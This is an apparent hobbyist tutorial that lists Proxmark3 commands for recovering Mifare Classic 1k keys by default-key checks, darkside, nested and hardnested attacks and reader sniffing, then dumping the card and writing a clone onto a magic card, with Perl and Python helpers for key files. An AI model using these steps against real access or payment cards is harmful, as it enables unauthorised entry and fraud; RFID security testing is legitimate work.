proxmark3 mifare classic 1k weak / hard

Quick summary of operations to crack/dump/duplicate a Mifare Classic 1k with the Proxmark3.

The darkside attack (for weak Mifare) can be run with low-cost hardware like the ACR122U, using mfcuk/mfoc on top of libnfc.

Nowadays this attack no longer covers many Mifare Classic cards. The Proxmark3, priced under $100, is the best choice.
With the Proxmark3, the weak-PRNG method is easy to follow, but the sniff/hardnested method for a hard PRNG is trickier.

You have the whole process here.

Hardware
Proxmark3 original or clone.
Chinese/Magic cards with block 0 / uid writeable.
… search on well-known China e-commerce/marketplace websites.
Software
https://github.com/iceman1001/proxmark3/releases

Info

./proxmark3 /dev/ttyACM[01]

pm3> hf 14a reader

1) First of all – try generic keys…

like this somekeys.txt, taken from Mifare Classic Tool (Android)

pm3> hf mf chk *1 A 1234567890ab somekeys.txt

If you are lucky, you have a key… now check it against B.

pm3> hf mf chk *1 ? KEY_FOUND

If you don’t have B, jump to the “Crack other keys” part of the relevant section 2.
If you have B, you have all the A/B keys and can jump to section 3.

2*) Method for weak

pm3> hf mf mifare

pm3> hf mf chk 0 A KEY_FOUND    (Check Found Key On Block 0 A)

Crack other keys

pm3> hf mf nested 1 0 A KEY_FOUND d   (Crack other keys)

2*) Method for hard

Sniff
The fun part… you have to fix the card to the Proxmark3 (duct tape), connected to a laptop, and set the Proxmark3 in sniff mode.
If you have a Y USB cable, you can also power the Proxmark3 from a USB power pack and connect it back to your desktop afterwards to get the traces.
The best way to sniff the whole transaction is to put the Proxmark3 between the card and the reader.
Push it against the reader, well aligned… and repeat it 3-4 times to get at least one good sniffed transaction.

pm3> hf 14a sniff

 --- trigger the reader with the card (Proxmark3 in between)
 --- remove and repeat to get many traces...

 --- push the Proxmark3 button to stop

 --- read the traces
pm3> hf 14a list

Mifare Classic protocol

Trace example

561882:  1 :     26
    64:  2 : TAG 04  00
 10217:  2 :     93  20
    64:  5 : TAG [[ 9c  59  9b  32 ]]  6c                       UID
 12313:  9 :     93  70  9c  59  9b  32  6c  6b  30
    64:  3 : TAG 08  b6  dd
923318:  4 :     60  ((EC))  f5  7b                             AUTH Block 0
   112:  4 : TAG [[ 82  a4  16  6c ]]                           Nonce Tag (NT)
  6985:  8 :     [[ a1  e4! 58  ce! ]] [[ 6e  ea! 41  e0! ]]    NR , AR
    64:  4 : TAG [[ 5c! ad  f4  39! ]]                          AT
811513:  4 :     8e  0e! 5d! b9                                 AUTH Block 0 N
   112:  4 : TAG 5a! 92  0d! 85!                                Nonce Tag (NT)
  6946:  8 :     98! d7  6b! 77  d6  c6  e8  70                 NR , AR
    64:  4 : TAG ca  7e! 0b! 63!                                AT
670868:  4 :     [[ 3e! 70  9c! 8a ]]
   112:  4 : TAG 36! 41  24! 79
  9505:  8 :     1b! 8c  3a! 48! 83  5a  4a! 27
    64:  4 : TAG 40! 6a! 99! 4b
905612:  4 :     c9  7c  64! 13!       !crc
   112:  4 : TAG b5! ab! 1d! 2b
  6936:  8 :     7e! d2  5c! ca! 4b! 50! 88! c4        !crc
    64:  4 : TAG bf  dd  01  be!
987853:  4 :     56  98  49  d6!       !crc

 ### last block e709c8a is not mandatory
./tools/mfkey/mfkey64 9c599b32 82a4166c a1e458ce 6eea41e0 5cadf439 e709c8a

Check key against A/B

pm3> hf mf chk *1 ? KEY_FOUND
... 

You can possibly skip the next step if the key is the same on A/B.

Crack other keys
Replace 60 with the decimal value of the hex byte shown between double parentheses in the trace example – ours is ‘EC’.

pm3> hf mf hardnested 0 A KEY_FOUND 60 B s w

pm3> sc r hard_autopwn -k KEY_FOUND -a

Keys to dumpkeys.bin (perl):

# Paste the full key table printed by the proxmark3 between the EOF markers.
my $v = <<EOF;
  |000|  a0a0a0a0a0a0  | 1 |  b0b0b0b0b0b0  | 1 |
  |001|  a0a0a0a0a0a0  | 1 |  b0b0b0b0b0b0  | 1 |
  ...
  |015|  a0a0a0a0a0a0  | 1 |  b0b0b0b0b0b0  | 1 |
EOF
# Collect every 12-hex-digit key in table order: A0, B0, A1, B1, ...
my @a;
while ($v =~ /.*?([0-9a-f]{12})/is) { push @a, $1; $v = $'; }
open FH, ">dumpkeys.bin" or die "dumpkeys.bin: $!";
binmode FH;
# dumpkeys.bin layout: all 16 A keys first (even indexes), then all 16 B keys
# (odd indexes), 6 raw bytes each.
foreach my $odd (0,1) {
  for (my $i=$odd;$i<=$#a;$i+=2) {
    my $s = $a[$i];
    while (length($s)) {            # turn the hex string into raw bytes
      print FH pack('C', oct('0x'.substr($s,0,2)));
      $s = substr($s, 2);
    }
  }
}
close FH;

Run it and you get a proper dumpkeys.bin, which 'hf mf dump' relies on.

vim hex2dumpkeys.pl
 --- put the full key table in it.
perl hex2dumpkeys.pl

3) From keys to write

Verify:

xxd dumpkeys.bin
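As an added example (not from the original post), the same conversion in Python with a check on the result: it parses the proxmark3 key table, packs it in the dumpkeys.bin layout used above (all 16 A keys, then all 16 B keys, 6 bytes each, 192 bytes total) and reads the file back to verify its size and sector order. The key table is constructed sample data with placeholder keys.

```python
import re

SECTORS = 16                         # Mifare Classic 1k: 16 sectors
KEY_LEN = 6                          # one Crypto1 key = 6 bytes
DUMP_SIZE = SECTORS * 2 * KEY_LEN    # 16 A keys + 16 B keys = 192 bytes

# Constructed sample table in the proxmark3 output format (placeholder keys).
SAMPLE_TABLE = "|sec|key A           |res|key B           |res|\n" + "\n".join(
    f"|{s:03d}|  {s:02x}aaaaaaaaaa  | 1 |  {s:02x}bbbbbbbbbb  | 1 |"
    for s in range(SECTORS))

ROW = re.compile(r"\s*\|(\d{3})\|\s*([0-9a-fA-F]{12})\s*\|\s*\d\s*\|\s*([0-9a-fA-F]{12})")

def parse_key_table(text):
    """Return [(keyA_hex, keyB_hex), ...] in sector order; header/separator
    lines and anything that is not a full 12-hex-digit key are skipped."""
    pairs = []
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            pairs.append((m.group(2).lower(), m.group(3).lower()))
    return pairs

def to_dumpkeys_bin(pairs):
    """Pack keys the way 'hf mf dump' expects: all A keys, then all B keys."""
    if len(pairs) != SECTORS:
        raise ValueError(f"need {SECTORS} sectors, got {len(pairs)}")
    a_keys = b"".join(bytes.fromhex(a) for a, _ in pairs)
    b_keys = b"".join(bytes.fromhex(b) for _, b in pairs)
    return a_keys + b_keys

def parse_dumpkeys_bin(data):
    """Inverse of to_dumpkeys_bin; rejects a file of the wrong size, which is
    worth checking before handing a hand-built file to 'hf mf dump'."""
    if len(data) != DUMP_SIZE:
        raise ValueError(f"dumpkeys.bin must be {DUMP_SIZE} bytes, got {len(data)}")
    keys = [data[i:i + KEY_LEN].hex() for i in range(0, DUMP_SIZE, KEY_LEN)]
    return list(zip(keys[:SECTORS], keys[SECTORS:]))

if __name__ == "__main__":
    pairs = parse_key_table(SAMPLE_TABLE)
    blob = to_dumpkeys_bin(pairs)
    assert parse_dumpkeys_bin(blob) == pairs      # round trip must match
    with open("dumpkeys.bin", "wb") as fh:
        fh.write(blob)
    for sector, (a, b) in enumerate(parse_dumpkeys_bin(blob)):
        print(f"sector {sector:2d}  A={a}  B={b}")
```

Run it against a real table by replacing SAMPLE_TABLE with the proxmark3 output, then compare the printed sectors with `xxd dumpkeys.bin`.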

Dump the card to dumpdata.bin

pm3> hf mf dump 1

Prepare .eml

python pm3_mfd2eml.py dumpdata.bin dumpdata.eml

Load it onto a blank Magic/Chinese card

pm3> hf mf cload dumpdata
